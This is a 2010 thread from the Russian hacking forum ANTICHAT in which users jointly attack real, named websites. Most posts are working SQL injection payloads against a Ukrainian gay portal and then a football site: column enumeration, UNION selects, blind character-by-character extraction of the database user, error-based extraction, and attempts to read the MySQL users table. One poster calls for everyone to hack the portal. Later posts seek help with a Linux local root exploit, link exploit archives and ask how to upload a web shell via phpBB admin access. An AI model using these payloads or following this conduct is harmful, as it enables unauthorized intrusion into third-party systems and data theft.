ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.05.2010, 14:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://gay.ks.ua/links.php?catid=32+order+by+4--
http://gay.ks.ua/links.php?catid=-32+union+select+1,2,3,4--
колонки не видны
ищи скул в другом скрипте
вот еще инфа
http://gay.ks.ua/links.php?catid=32+and+substring(user(),1,1)=char( 103)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),2,1)=char( 97)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),3,1)=char( 121)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),4,1)=char( 107)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),5,1)=char( 115)
юзер-gayks
http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile _os,1,1)=char(112)
http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile _os,2,1)=char(99)
думаю ос pc-linux
Последний раз редактировалось Konqi; 08.05.2010 в 14:31..
|
|
|
08.05.2010, 14:36
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
http://gay.ks.ua/links.php?catid=32 order by 5
=>
Unknown column '5' in 'order clause'
=> по идее можно выводить данные через ошибку
|
|
|
|
08.05.2010, 14:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от DrakonHaSh
http://gay.ks.ua/links.php?catid=32 order by 5
=>
Unknown column '5' in 'order clause'
=> по идее можно выводить данные через ошибку
на пример
|
|
|
|
08.05.2010, 14:59
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
я про то, что вывод ошибки можно поймать
а вот использовать методы из Вывод информации в ошибке для MySQL всех версий у меня не получилось. может у вас получится 
http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM mysql.users
=>
SELECT command denied to user: 'gayks_admin@localhost' for table 'users'
http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM users
=>
Table 'gayks_phorum.users' doesn't exist
прогнал тулзой пашкелы подбор таблиц (без префикса), нашла только одну - video:
http://gay.ks.ua/links.php?catid=32 UNION SELECT id FROM video
=>
The used SELECT statements have a different number of columns
Последний раз редактировалось DrakonHaSh; 08.05.2010 в 16:16..
|
|
|
|
08.05.2010, 15:18
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
В связи с открытием блога, достаю из недр античата ещё один обнаруженный мной метод, который работает для MySQL всех версий начиная с 4.1 .
gay.ks.ua/links.php?catid=32+and+substring(@@version,1,2)= 4.0
|
|
|
|
08.05.2010, 15:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
database() - gayks
щас всем народом будем взломать гей портал
|
|
|
|
08.05.2010, 16:28
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
заметил у них на на форуме:
Copyright BOY-UANIC 2002-2010
сходил в гугл, нашел это:
http://www.eu-football.info/_links.php?catid=10 and+substring(version(),1,1)=5
т.е. тот же движ, но mysql - 5-ка, соответственно в ней скорее всего можно все, что надо, подсмотреть
балин, и тут облом 
http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select +version()),floor(rand(0)* 2))+from+information_schema.tables+group+by+2)a)--+
=>
SELECT command denied to user 'gbua_f00t'@'213.186.117.208' for table 'tables'
а вот таблица video и здесь присутствует:
http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select +version()),floor(rand(0)* 2))+from+video+group+by+2)a)--+
=>
Duplicate entry '5.0.45-community-nt-log1' for key 1
Последний раз редактировалось DrakonHaSh; 08.05.2010 в 16:37..
|
|
|
|
08.05.2010, 17:27
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
всем доброго времени суток.
вопрос - есть сервер Linux 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686
скачал скомпилированный эксплойт Krad отсюда http://files.xakep.biz/Local_Root_Exploits/krad
запускаю ./exploit
получаю ошибку: [6658: 3] tcsetattr: Invalid argument
эээ...что не так ?
|
|
|
|
08.05.2010, 17:28
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
|
|
|
|
08.05.2010, 18:01
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
phpbb 2.0.22, есть админские права ..можно как нить залить шелл ??
на эту версию ничего не нашел
http://forum.antichat.ru/thread24488.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2130496){kind=avatar}
Похожие темы
Линейный вид
